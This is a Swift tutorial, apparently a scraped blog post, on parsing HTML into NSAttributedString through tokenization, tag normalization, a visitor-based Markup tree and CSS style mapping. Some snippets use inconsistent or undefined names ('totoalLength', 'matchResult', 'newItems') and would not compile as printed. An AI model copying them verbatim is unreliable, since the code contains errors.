+
var tokenizationResult: [HTMLParsedResult] = []
+
+let expression = try? NSRegularExpression(pattern: pattern, options: expressionOptions)
+let attributedString = NSAttributedString(string: "<a>Li<b>nk</a>Bold</b>")
+let totalLength = attributedString.string.utf16.count // utf-16 support emoji
+var lastMatch: NSTextCheckingResult?
+
+// Start Tags Stack, First In Last Out (FILO)
+// Check if the HTML string needs subsequent normalization to correct misalignment or add self-closing tags
+var stackStartItems: [HTMLParsedResult.StartItem] = []
+var needForamatter: Bool = false
+
+expression.enumerateMatches(in: attributedString.string, range: NSMakeRange(0, totoalLength)) { match, _, _ in
+ if let match = match {
+ // Check the string between tags or before the first tag
+ // e.g. Test<a>Link</a>zzz<b>bold</b>Test2 - > Test,zzz
+ let lastMatchEnd = lastMatch?.range.upperBound ?? 0
+ let currentMatchStart = match.range.lowerBound
+ if currentMatchStart > lastMatchEnd {
+ let rawStringBetweenTag = attributedString.attributedSubstring(from: NSMakeRange(lastMatchEnd, (currentMatchStart - lastMatchEnd)))
+ tokenizationResult.append(.rawString(rawStringBetweenTag))
+ }
+
+ // <a href="https://zhgchg.li">, </a>
+ let matchAttributedString = attributedString.attributedSubstring(from: match.range)
+ // a, a
+ let matchTag = attributedString.attributedSubstring(from: match.range(withName: "tagName"))?.string.trimmingCharacters(in: .whitespacesAndNewlines).lowercased()
+ // false, true
+ let matchIsEndTag = matchResult.attributedString(from: match.range(withName: "closeTag"))?.string.trimmingCharacters(in: .whitespacesAndNewlines) == "/"
+ // href="https://zhgchg.li", nil
+ // Use regex to further extract HTML attributes, to [String: String], refer to the source code
+ let matchTagAttributes = parseAttributes(matchResult.attributedString(from: match.range(withName: "tagAttributes")))
+ // false, false
+ let matchIsSelfClosingTag = matchResult.attributedString(from: match.range(withName: "selfClosingTag"))?.string.trimmingCharacters(in: .whitespacesAndNewlines) == "/"
+
+ if let matchAttributedString = matchAttributedString,
+ let matchTag = matchTag {
+ if matchIsSelfClosingTag {
+ // e.g. <br/>
+ tokenizationResult.append(.selfClosing(.init(tagName: matchTag, tagAttributedString: matchAttributedString, attributes: matchTagAttributes)))
+ } else {
+ // e.g. <a> or </a>
+ if matchIsEndTag {
+ // e.g. </a>
+ // Retrieve the position of the same tag name from the stack, starting from the last
+ if let index = stackStartItems.lastIndex(where: { $0.tagName == matchTag }) {
+ // If it's not the last one, it means there is a misalignment or a missing closing tag
+ if index != stackStartItems.count - 1 {
+ needForamatter = true
+ }
+ tokenizationResult.append(.close(.init(tagName: matchTag)))
+ stackStartItems.remove(at: index)
+ } else {
+ // Extra close tag e.g </a>
+ // Does not affect subsequent processing, just ignore
+ }
+ } else {
+ // e.g. <a>
+ let startItem: HTMLParsedResult.StartItem = HTMLParsedResult.StartItem(tagName: matchTag, tagAttributedString: matchAttributedString, attributes: matchTagAttributes)
+ tokenizationResult.append(.start(startItem))
+ // Add to stack
+ stackStartItems.append(startItem)
+ }
+ }
+ }
+
+ lastMatch = match
+ }
+}
+
+// Check the ending raw string
+// e.g. Test<a>Link</a>Test2 - > Test2
+if let lastMatch = lastMatch {
+ let currentIndex = lastMatch.range.upperBound
+ if totoalLength > currentIndex {
+ // There are remaining strings
+ let resetString = attributedString.attributedSubstring(from: NSMakeRange(currentIndex, (totoalLength - currentIndex)))
+ tokenizationResult.append(.rawString(resetString))
+ }
+} else {
+ // lastMatch = nil, meaning no tags were found, all are plain text
+ let resetString = attributedString.attributedSubstring(from: NSMakeRange(0, totoalLength))
+ tokenizationResult.append(.rawString(resetString))
+}
+
+// Check if the stack is empty, if not, it means there are start tags without corresponding end tags
+// Mark as isolated start tags
+for stackStartItem in stackStartItems {
+ stackStartItem.isIsolated = true
+ needForamatter = true
+}
+
+print(tokenizationResult)
+// [
+// .start("a",["href":"https://zhgchg.li"])
+// .rawString("Li")
+// .start("b",nil)
+// .rawString("nk")
+// .close("a")
+// .rawString("Bold")
+// .close("b")
+// ]
+
Operation flow as shown in the figure
The final result will be an array of Tokenization results.
Corresponding source code in HTMLStringToParsedResultProcessor.swift implementation
a.k.a Formatter, normalization
After obtaining the preliminary parsing results in the previous step, if it is found during parsing that further normalization is needed, this step is required to automatically correct HTML Tag issues.
There are three types of HTML Tag issues:
<br>
<Congratulation!>
<a>Li<b>nk</a>Bold</b>
The correction method is also very simple. We need to traverse the elements of the Tokenization results and try to fill in the gaps.
Operation flow as shown in the figure
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+76
+77
+78
+79
+80
+81
+
var normalizationResult = tokenizationResult
+
+// Start Tags Stack, First In Last Out (FILO)
+var stackExpectedStartItems: [HTMLParsedResult.StartItem] = []
+var itemIndex = 0
+while itemIndex < newItems.count {
+ switch newItems[itemIndex] {
+ case .start(let item):
+ if item.isIsolated {
+ // If it is an isolated Start Tag
+ if WC3HTMLTagName(rawValue: item.tagName) == nil && (item.attributes?.isEmpty ?? true) {
+ // If it is not a WCS defined HTML Tag & has no HTML Attribute
+ // WC3HTMLTagName Enum can refer to Source Code
+ // Determine as general text mistaken as HTML Tag
+ // Change to raw string type
+ normalizationResult[itemIndex] = .rawString(item.tagAttributedString)
+ } else {
+ // Otherwise, change to self-closing tag, e.g., <br> -> <br/>
+ normalizationResult[itemIndex] = .selfClosing(item.convertToSelfClosingParsedItem())
+ }
+ itemIndex += 1
+ } else {
+ // Normal Start Tag, add to Stack
+ stackExpectedStartItems.append(item)
+ itemIndex += 1
+ }
+ case .close(let item):
+ // Encounter Close Tag
+ // Get the Tags between the Start Stack Tag and this Close Tag
+ // e.g., <a><u><b>[CurrentIndex]</a></u></b> -> interval 0
+ // e.g., <a><u><b>[CurrentIndex]</a></u></b> -> interval b,u
+
+ let reversedStackExpectedStartItems = Array(stackExpectedStartItems.reversed())
+ guard let reversedStackExpectedStartItemsOccurredIndex = reversedStackExpectedStartItems.firstIndex(where: { $0.tagName == item.tagName }) else {
+ itemIndex += 1
+ continue
+ }
+
+ let reversedStackExpectedStartItemsOccurred = Array(reversedStackExpectedStartItems.prefix(upTo: reversedStackExpectedStartItemsOccurredIndex))
+
+ // Interval 0, means no tag misalignment
+ guard reversedStackExpectedStartItemsOccurred.count != 0 else {
+ // is pair, pop
+ stackExpectedStartItems.removeLast()
+ itemIndex += 1
+ continue
+ }
+
+ // There are other intervals, automatically fill in the interval Tags
+ // e.g., <a><u><b>[CurrentIndex]</a></u></b> ->
+ // e.g., <a><u><b>[CurrentIndex]</b></u></a><b></u></u></b>
+ let stackExpectedStartItemsOccurred = Array(reversedStackExpectedStartItemsOccurred.reversed())
+ let afterItems = stackExpectedStartItemsOccurred.map({ HTMLParsedResult.start($0) })
+ let beforeItems = reversedStackExpectedStartItemsOccurred.map({ HTMLParsedResult.close($0.convertToCloseParsedItem()) })
+ normalizationResult.insert(contentsOf: afterItems, at: newItems.index(after: itemIndex))
+ normalizationResult.insert(contentsOf: beforeItems, at: itemIndex)
+
+ itemIndex = newItems.index(after: itemIndex) + stackExpectedStartItemsOccurred.count
+
+ // Update Start Stack Tags
+ // e.g., -> b,u
+ stackExpectedStartItems.removeAll { startItem in
+ return reversedStackExpectedStartItems.prefix(through: reversedStackExpectedStartItemsOccurredIndex).contains(where: { $0 === startItem })
+ }
+ case .selfClosing, .rawString:
+ itemIndex += 1
+ }
+}
+
+print(normalizationResult)
+// [
+// .start("a",["href":"https://zhgchg.li"])
+// .rawString("Li")
+// .start("b",nil)
+// .rawString("nk")
+// .close("b")
+// .close("a")
+// .start("b",nil)
+// .rawString("Bold")
+// .close("b")
+// ]
+
Corresponding implementation in the source code HTMLParsedResultFormatterProcessor.swift
a.k.a AST, Abstract Tree
After the Tokenization & Normalization data preprocessing is completed, the result needs to be converted into an abstract tree 🌲.
As shown in the figure
Converting into an abstract tree facilitates our future operations and extensions, such as implementing Selector functionality or other conversions like HTML to Markdown; or if we want to add Markdown to NSAttributedString in the future, we only need to implement Markdown’s Tokenization & Normalization to complete it.
First, we define a Markup Protocol with Child & Parent properties to record the information of leaves and branches:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+
protocol Markup: AnyObject {
+ var parentMarkup: Markup? { get set }
+ var childMarkups: [Markup] { get set }
+
+ func appendChild(markup: Markup)
+ func prependChild(markup: Markup)
+ func accept<V: MarkupVisitor>(_ visitor: V) -> V.Result
+}
+
+extension Markup {
+ func appendChild(markup: Markup) {
+ markup.parentMarkup = self
+ childMarkups.append(markup)
+ }
+
+ func prependChild(markup: Markup) {
+ markup.parentMarkup = self
+ childMarkups.insert(markup, at: 0)
+ }
+}
+
Additionally, using the Visitor Pattern, each style attribute is defined as an object Element, and different Visit strategies are used to obtain individual application results.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+
protocol MarkupVisitor {
+ associatedtype Result
+
+ func visit(markup: Markup) -> Result
+
+ func visit(_ markup: RootMarkup) -> Result
+ func visit(_ markup: RawStringMarkup) -> Result
+
+ func visit(_ markup: BoldMarkup) -> Result
+ func visit(_ markup: LinkMarkup) -> Result
+ //...
+}
+
+extension MarkupVisitor {
+ func visit(markup: Markup) -> Result {
+ return markup.accept(self)
+ }
+}
+
Basic Markup nodes:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+
// Root node
+final class RootMarkup: Markup {
+ weak var parentMarkup: Markup? = nil
+ var childMarkups: [Markup] = []
+
+ func accept<V>(_ visitor: V) -> V.Result where V : MarkupVisitor {
+ return visitor.visit(self)
+ }
+}
+
+// Leaf node
+final class RawStringMarkup: Markup {
+ let attributedString: NSAttributedString
+
+ init(attributedString: NSAttributedString) {
+ self.attributedString = attributedString
+ }
+
+ weak var parentMarkup: Markup? = nil
+ var childMarkups: [Markup] = []
+
+ func accept<V>(_ visitor: V) -> V.Result where V : MarkupVisitor {
+ return visitor.visit(self)
+ }
+}
+
Define Markup Style Nodes:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+
// Branch nodes:
+
+// Link style
+final class LinkMarkup: Markup {
+ weak var parentMarkup: Markup? = nil
+ var childMarkups: [Markup] = []
+
+ func accept<V>(_ visitor: V) -> V.Result where V : MarkupVisitor {
+ return visitor.visit(self)
+ }
+}
+
+// Bold style
+final class BoldMarkup: Markup {
+ weak var parentMarkup: Markup? = nil
+ var childMarkups: [Markup] = []
+
+ func accept<V>(_ visitor: V) -> V.Result where V : MarkupVisitor {
+ return visitor.visit(self)
+ }
+}
+
Corresponding implementation in the source code Markup
Before converting to an abstract tree, we also need…
Because our tree structure does not depend on any data structure (for example, a node/LinkMarkup should have URL information to perform subsequent rendering). For this, we define a container to store tree nodes and related data information:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+
protocol MarkupComponent {
+ associatedtype T
+ var markup: Markup { get }
+ var value: T { get }
+
+ init(markup: Markup, value: T)
+}
+
+extension Sequence where Iterator.Element: MarkupComponent {
+ func value(markup: Markup) -> Element.T? {
+ return self.first(where:{ $0.markup === markup })?.value as? Element.T
+ }
+}
+
Corresponding implementation in the source code MarkupComponent
You can also declare Markup as Hashable
and directly use Dictionary to store values [Markup: Any]
, but in this way, Markup cannot be used as a general type and needs to be prefixed with any Markup
.
We also abstracted the HTML Tag Name part, allowing users to decide which tags need to be processed and facilitating future extensions. For example, the <strong>
Tag Name can correspond to BoldMarkup
.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+
public protocol HTMLTagName {
+ var string: String { get }
+ func accept<V: HTMLTagNameVisitor>(_ visitor: V) -> V.Result
+}
+
+public struct A_HTMLTagName: HTMLTagName {
+ public let string: String = WC3HTMLTagName.a.rawValue
+
+ public init() {
+
+ }
+
+ public func accept<V>(_ visitor: V) -> V.Result where V : HTMLTagNameVisitor {
+ return visitor.visit(self)
+ }
+}
+
+public struct B_HTMLTagName: HTMLTagName {
+ public let string: String = WC3HTMLTagName.b.rawValue
+
+ public init() {
+
+ }
+
+ public func accept<V>(_ visitor: V) -> V.Result where V : HTMLTagNameVisitor {
+ return visitor.visit(self)
+ }
+}
+
Corresponding implementation in the source code HTMLTagNameVisitor
Additionally, refer to the W3C wiki which lists the HTML tag name enum: WC3HTMLTagName.swift
HTMLTag is simply a container object because we want to allow external specification of the style corresponding to the HTML Tag, so we declare a container to put them together:
1
+2
+3
+4
+5
+6
+7
+8
+9
+
struct HTMLTag {
+ let tagName: HTMLTagName
+ let customStyle: MarkupStyle? // Render will be explained later
+
+ init(tagName: HTMLTagName, customStyle: MarkupStyle? = nil) {
+ self.tagName = tagName
+ self.customStyle = customStyle
+ }
+}
+
Corresponding implementation in the source code HTMLTag
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+
struct HTMLTagNameToMarkupVisitor: HTMLTagNameVisitor {
+ typealias Result = Markup
+
+ let attributes: [String: String]?
+
+ func visit(_ tagName: A_HTMLTagName) -> Result {
+ return LinkMarkup()
+ }
+
+ func visit(_ tagName: B_HTMLTagName) -> Result {
+ return BoldMarkup()
+ }
+ //...
+}
+
Corresponding implementation in the source code HTMLTagNameToHTMLMarkupVisitor
We need to convert the result of the normalized HTML data into an abstract tree. First, declare a MarkupComponent data structure that can store HTML data:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+
struct HTMLElementMarkupComponent: MarkupComponent {
+ struct HTMLElement {
+ let tag: HTMLTag
+ let tagAttributedString: NSAttributedString
+ let attributes: [String: String]?
+ }
+
+ typealias T = HTMLElement
+
+ let markup: Markup
+ let value: HTMLElement
+ init(markup: Markup, value: HTMLElement) {
+ self.markup = markup
+ self.value = value
+ }
+}
+
Convert to Markup Abstract Tree:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+
var htmlElementComponents: [HTMLElementMarkupComponent] = []
+let rootMarkup = RootMarkup()
+var currentMarkup: Markup = rootMarkup
+
+let htmlTags: [String: HTMLTag]
+init(htmlTags: [HTMLTag]) {
+ self.htmlTags = Dictionary(uniqueKeysWithValues: htmlTags.map{ ($0.tagName.string, $0) })
+}
+
+// Start Tags Stack, ensure correct pop tag
+// Normalization has already been done before, it should not go wrong, just to ensure
+var stackExpectedStartItems: [HTMLParsedResult.StartItem] = []
+for thisItem in from {
+ switch thisItem {
+ case .start(let item):
+ let visitor = HTMLTagNameToMarkupVisitor(attributes: item.attributes)
+ let htmlTag = self.htmlTags[item.tagName] ?? HTMLTag(tagName: ExtendTagName(item.tagName))
+ // Use Visitor to ask for the corresponding Markup
+ let markup = visitor.visit(tagName: htmlTag.tagName)
+
+ // Add itself to the current branch's leaf node
+ // Itself becomes the current branch node
+ htmlElementComponents.append(.init(markup: markup, value: .init(tag: htmlTag, tagAttributedString: item.tagAttributedString, attributes: item.attributes)))
+ currentMarkup.appendChild(markup: markup)
+ currentMarkup = markup
+
+ stackExpectedStartItems.append(item)
+ case .selfClosing(let item):
+ // Directly add to the current branch's leaf node
+ let visitor = HTMLTagNameToMarkupVisitor(attributes: item.attributes)
+ let htmlTag = self.htmlTags[item.tagName] ?? HTMLTag(tagName: ExtendTagName(item.tagName))
+ let markup = visitor.visit(tagName: htmlTag.tagName)
+ htmlElementComponents.append(.init(markup: markup, value: .init(tag: htmlTag, tagAttributedString: item.tagAttributedString, attributes: item.attributes)))
+ currentMarkup.appendChild(markup: markup)
+ case .close(let item):
+ if let lastTagName = stackExpectedStartItems.popLast()?.tagName,
+ lastTagName == item.tagName {
+ // When encountering Close Tag, return to the previous level
+ currentMarkup = currentMarkup.parentMarkup ?? currentMarkup
+ }
+ case .rawString(let attributedString):
+ // Directly add to the current branch's leaf node
+ currentMarkup.appendChild(markup: RawStringMarkup(attributedString: attributedString))
+ }
+}
+
+// print(htmlElementComponents)
+// [(markup: LinkMarkup, (tag: a, attributes: ["href":"zhgchg.li"]...)]
+
Operation result as shown in the figure
Corresponding source code implementation in HTMLParsedResultToHTMLElementWithRootMarkupProcessor.swift
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+
public class HTMLSelector: CustomStringConvertible {
+
+ let markup: Markup
+ let componets: [HTMLElementMarkupComponent]
+ init(markup: Markup, componets: [HTMLElementMarkupComponent]) {
+ self.markup = markup
+ self.componets = componets
+ }
+
+ public func filter(_ htmlTagName: String) -> [HTMLSelector] {
+ let result = markup.childMarkups.filter({ componets.value(markup: $0)?.tag.tagName.isEqualTo(htmlTagName) ?? false })
+ return result.map({ .init(markup: $0, componets: componets) })
+ }
+
+ //...
+}
+
We can filter leaf node objects layer by layer.
Corresponding source code implementation in HTMLSelector
Next, we need to complete the conversion of HTML to MarkupStyle (NSAttributedString.Key).
NSAttributedString sets the text style through NSAttributedString.Key Attributes. We abstract all fields of NSAttributedString.Key to correspond to MarkupStyle, MarkupStyleColor, MarkupStyleFont, MarkupStyleParagraphStyle.
Purpose:
[NSAttributedString.Key: Any?]
. If exposed directly, it is difficult to control the values users input, and incorrect values may cause crashes, such as .font: 123
.<a><b>test</b></a>
, where the style of the test string inherits from the link’s bold (bold+link); if the Dictionary is exposed directly, it is difficult to control the inheritance rules.1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+76
+77
+78
+79
+80
+81
+82
+83
+84
+85
+86
+87
+88
+89
+90
+91
+92
+93
+94
+95
+96
+97
+98
+99
+100
+101
+102
+
public struct MarkupStyle {
+ public var font:MarkupStyleFont
+ public var paragraphStyle:MarkupStyleParagraphStyle
+ public var foregroundColor:MarkupStyleColor? = nil
+ public var backgroundColor:MarkupStyleColor? = nil
+ public var ligature:NSNumber? = nil
+ public var kern:NSNumber? = nil
+ public var tracking:NSNumber? = nil
+ public var strikethroughStyle:NSUnderlineStyle? = nil
+ public var underlineStyle:NSUnderlineStyle? = nil
+ public var strokeColor:MarkupStyleColor? = nil
+ public var strokeWidth:NSNumber? = nil
+ public var shadow:NSShadow? = nil
+ public var textEffect:String? = nil
+ public var attachment:NSTextAttachment? = nil
+ public var link:URL? = nil
+ public var baselineOffset:NSNumber? = nil
+ public var underlineColor:MarkupStyleColor? = nil
+ public var strikethroughColor:MarkupStyleColor? = nil
+ public var obliqueness:NSNumber? = nil
+ public var expansion:NSNumber? = nil
+ public var writingDirection:NSNumber? = nil
+ public var verticalGlyphForm:NSNumber? = nil
+ //...
+
+ // Inherited from...
+ // Default: When the field is nil, fill in the current data object from 'from'
+ mutating func fillIfNil(from: MarkupStyle?) {
+ guard let from = from else { return }
+
+ var currentFont = self.font
+ currentFont.fillIfNil(from: from.font)
+ self.font = currentFont
+
+ var currentParagraphStyle = self.paragraphStyle
+ currentParagraphStyle.fillIfNil(from: from.paragraphStyle)
+ self.paragraphStyle = currentParagraphStyle
+ //..
+ }
+
+ // MarkupStyle to NSAttributedString.Key: Any
+ func render() -> [NSAttributedString.Key: Any] {
+ var data: [NSAttributedString.Key: Any] = [:]
+
+ if let font = font.getFont() {
+ data[.font] = font
+ }
+
+ if let ligature = self.ligature {
+ data[.ligature] = ligature
+ }
+ //...
+ return data
+ }
+}
+
+public struct MarkupStyleFont: MarkupStyleItem {
+ public enum FontWeight {
+ case style(FontWeightStyle)
+ case rawValue(CGFloat)
+ }
+ public enum FontWeightStyle: String {
+ case ultraLight, light, thin, regular, medium, semibold, bold, heavy, black
+ // ...
+ }
+
+ public var size: CGFloat?
+ public var weight: FontWeight?
+ public var italic: Bool?
+ //...
+}
+
+public struct MarkupStyleParagraphStyle: MarkupStyleItem {
+ public var lineSpacing:CGFloat? = nil
+ public var paragraphSpacing:CGFloat? = nil
+ public var alignment:NSTextAlignment? = nil
+ public var headIndent:CGFloat? = nil
+ public var tailIndent:CGFloat? = nil
+ public var firstLineHeadIndent:CGFloat? = nil
+ public var minimumLineHeight:CGFloat? = nil
+ public var maximumLineHeight:CGFloat? = nil
+ public var lineBreakMode:NSLineBreakMode? = nil
+ public var baseWritingDirection:NSWritingDirection? = nil
+ public var lineHeightMultiple:CGFloat? = nil
+ public var paragraphSpacingBefore:CGFloat? = nil
+ public var hyphenationFactor:Float? = nil
+ public var usesDefaultHyphenation:Bool? = nil
+ public var tabStops: [NSTextTab]? = nil
+ public var defaultTabInterval:CGFloat? = nil
+ public var textLists: [NSTextList]? = nil
+ public var allowsDefaultTighteningForTruncation:Bool? = nil
+ public var lineBreakStrategy: NSParagraphStyle.LineBreakStrategy? = nil
+ //...
+}
+
+public struct MarkupStyleColor {
+ let red: Int
+ let green: Int
+ let blue: Int
+ let alpha: CGFloat
+ //...
+}
+
Corresponding implementation in the source code MarkupStyle
Additionally, refer to the W3c wiki, browser predefined color name enumerates the corresponding color name text & color R,G,B enum: MarkupStyleColorName.swift
Let’s talk a bit more about these two objects because HTML Tags are allowed to be styled using CSS settings; for this, we abstract the HTMLTagName and apply it once again to the HTML Style Attribute.
For example, HTML might provide: <a style=”color:red;font-size:14px”>RedLink</a>
, which means this link should be set to red and size 14px.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+
public protocol HTMLTagStyleAttribute {
+ var styleName: String { get }
+
+ func accept<V: HTMLTagStyleAttributeVisitor>(_ visitor: V) -> V.Result
+}
+
+public protocol HTMLTagStyleAttributeVisitor {
+ associatedtype Result
+
+ func visit(styleAttribute: HTMLTagStyleAttribute) -> Result
+ func visit(_ styleAttribute: ColorHTMLTagStyleAttribute) -> Result
+ func visit(_ styleAttribute: FontSizeHTMLTagStyleAttribute) -> Result
+ //...
+}
+
+public extension HTMLTagStyleAttributeVisitor {
+ func visit(styleAttribute: HTMLTagStyleAttribute) -> Result {
+ return styleAttribute.accept(self)
+ }
+}
+
Corresponding implementation in the source code HTMLTagStyleAttribute
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+
struct HTMLTagStyleAttributeToMarkupStyleVisitor: HTMLTagStyleAttributeVisitor {
+ typealias Result = MarkupStyle?
+
+ let value: String
+
+ func visit(_ styleAttribute: ColorHTMLTagStyleAttribute) -> Result {
+ // Regex to extract Color Hex or Mapping from HTML Pre-defined Color Name, please refer to the Source Code
+ guard let color = MarkupStyleColor(string: value) else { return nil }
+ return MarkupStyle(foregroundColor: color)
+ }
+
+ func visit(_ styleAttribute: FontSizeHTMLTagStyleAttribute) -> Result {
+ // Regex to extract 10px -> 10, please refer to the Source Code
+ guard let size = self.convert(fromPX: value) else { return nil }
+ return MarkupStyle(font: MarkupStyleFont(size: CGFloat(size)))
+ }
+ // ...
+}
+
Corresponding implementation in the source code HTMLTagAttributeToMarkupStyleVisitor.swift
init’s value = attribute’s value, converted to the corresponding MarkupStyle field according to the visit type.
After introducing the MarkupStyle object, we need to convert the result of Normalization’s HTMLElementComponents into MarkupStyle.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+76
+77
+78
+79
+80
+81
+82
+83
+84
+85
+86
+87
+88
+89
+90
+91
+92
+93
+94
+95
+96
+97
+98
+99
+
// MarkupStyle policy
+public enum MarkupStylePolicy {
+ case respectMarkupStyleFromCode // Prioritize from Code, fill in with HTML Style Attribute
+ case respectMarkupStyleFromHTMLStyleAttribute // Prioritize from HTML Style Attribute, fill in with Code
+}
+
+struct HTMLElementMarkupComponentMarkupStyleVisitor: MarkupVisitor {
+
+ typealias Result = MarkupStyle?
+
+ let policy: MarkupStylePolicy
+ let components: [HTMLElementMarkupComponent]
+ let styleAttributes: [HTMLTagStyleAttribute]
+
+ func visit(_ markup: BoldMarkup) -> Result {
+ // .bold is just a default style defined in MarkupStyle, please refer to the Source Code
+ return defaultVisit(components.value(markup: markup), defaultStyle: .bold)
+ }
+
+ func visit(_ markup: LinkMarkup) -> Result {
+ // .link is just a default style defined in MarkupStyle, please refer to the Source Code
+ var markupStyle = defaultVisit(components.value(markup: markup), defaultStyle: .link) ?? .link
+
+ // Get the HtmlElement corresponding to LinkMarkup from HtmlElementComponents
+ // Find the href parameter from the attributes of HtmlElement (HTML carries URL String)
+ if let href = components.value(markup: markup)?.attributes?["href"] as? String,
+ let url = URL(string: href) {
+ markupStyle.link = url
+ }
+ return markupStyle
+ }
+
+ // ...
+}
+
+extension HTMLElementMarkupComponentMarkupStyleVisitor {
+ // Get the custom MarkupStyle specified in the HTMLTag container
+ private func customStyle(_ htmlElement: HTMLElementMarkupComponent.HTMLElement?) -> MarkupStyle? {
+ guard let customStyle = htmlElement?.tag.customStyle else {
+ return nil
+ }
+ return customStyle
+ }
+
+ // Default action
+ func defaultVisit(_ htmlElement: HTMLElementMarkupComponent.HTMLElement?, defaultStyle: MarkupStyle? = nil) -> Result {
+ var markupStyle: MarkupStyle? = customStyle(htmlElement) ?? defaultStyle
+ // Get the HtmlElement corresponding to LinkMarkup from HtmlElementComponents
+ // Check if the attributes of HtmlElement have a `Style` Attribute
+ guard let styleString = htmlElement?.attributes?["style"],
+ styleAttributes.count > 0 else {
+ // No
+ return markupStyle
+ }
+
+ // Has Style Attributes
+ // Split the Style Value string into an array
+ // font-size:14px;color:red -> ["font-size":"14px","color":"red"]
+ let styles = styleString.split(separator: ";").filter { $0.trimmingCharacters(in: .whitespacesAndNewlines) != "" }.map { $0.split(separator: ":") }
+
+ for style in styles {
+ guard style.count == 2 else {
+ continue
+ }
+ // e.g font-size
+ let key = style[0].trimmingCharacters(in: .whitespacesAndNewlines)
+ // e.g. 14px
+ let value = style[1].trimmingCharacters(in: .whitespacesAndNewlines)
+
+ if let styleAttribute = styleAttributes.first(where: { $0.isEqualTo(styleName: key) }) {
+ // Use the HTMLTagStyleAttributeToMarkupStyleVisitor mentioned above to convert back to MarkupStyle
+ let visitor = HTMLTagStyleAttributeToMarkupStyleVisitor(value: value)
+ if var thisMarkupStyle = visitor.visit(styleAttribute: styleAttribute) {
+ // When Style Attribute has a return value..
+ // Merge the result of the previous MarkupStyle
+ thisMarkupStyle.fillIfNil(from: markupStyle)
+ markupStyle = thisMarkupStyle
+ }
+ }
+ }
+
+ // If there is a default Style
+ if var defaultStyle = defaultStyle {
+ switch policy {
+ case .respectMarkupStyleFromHTMLStyleAttribute:
+ // Prioritize Style Attribute MarkupStyle, then
+ // Merge the result of defaultStyle
+ markupStyle?.fillIfNil(from: defaultStyle)
+ case .respectMarkupStyleFromCode:
+ // Prioritize defaultStyle, then
+ // Merge the result of Style Attribute MarkupStyle
+ defaultStyle.fillIfNil(from: markupStyle)
+ markupStyle = defaultStyle
+ }
+ }
+
+ return markupStyle
+ }
+}
+
Corresponding implementation in the source code HTMLTagAttributeToMarkupStyleVisitor.swift
We will define some default styles in MarkupStyle. Some Markup will use the default style if the desired style is not specified from outside the code.
There are two style inheritance strategies:
Convert the Normalization result into AST & MarkupStyleComponent.
Declare a new MarkupComponent to store the corresponding MarkupStyle:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+
struct MarkupStyleComponent: MarkupComponent {
+ typealias T = MarkupStyle
+
+ let markup: Markup
+ let value: MarkupStyle
+ init(markup: Markup, value: MarkupStyle) {
+ self.markup = markup
+ self.value = value
+ }
+}
+
Simple traversal of the Markup Tree & HTMLElementMarkupComponent structure:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+
let styleAttributes: [HTMLTagStyleAttribute]
+let policy: MarkupStylePolicy
+
+func process(from: (Markup, [HTMLElementMarkupComponent])) -> [MarkupStyleComponent] {
+ var components: [MarkupStyleComponent] = []
+ let visitor = HTMLElementMarkupComponentMarkupStyleVisitor(policy: policy, components: from.1, styleAttributes: styleAttributes)
+ walk(markup: from.0, visitor: visitor, components: &components)
+ return components
+}
+
+func walk(markup: Markup, visitor: HTMLElementMarkupComponentMarkupStyleVisitor, components: inout [MarkupStyleComponent]) {
+
+ if let markupStyle = visitor.visit(markup: markup) {
+ components.append(.init(markup: markup, value: markupStyle))
+ }
+
+ for markup in markup.childMarkups {
+ walk(markup: markup, visitor: visitor, components: &components)
+ }
+}
+
+// print(components)
+// [(markup: LinkMarkup, MarkupStyle(link: https://zhgchg.li, color: .blue)]
+// [(markup: BoldMarkup, MarkupStyle(font: .init(weight: .bold))]
+
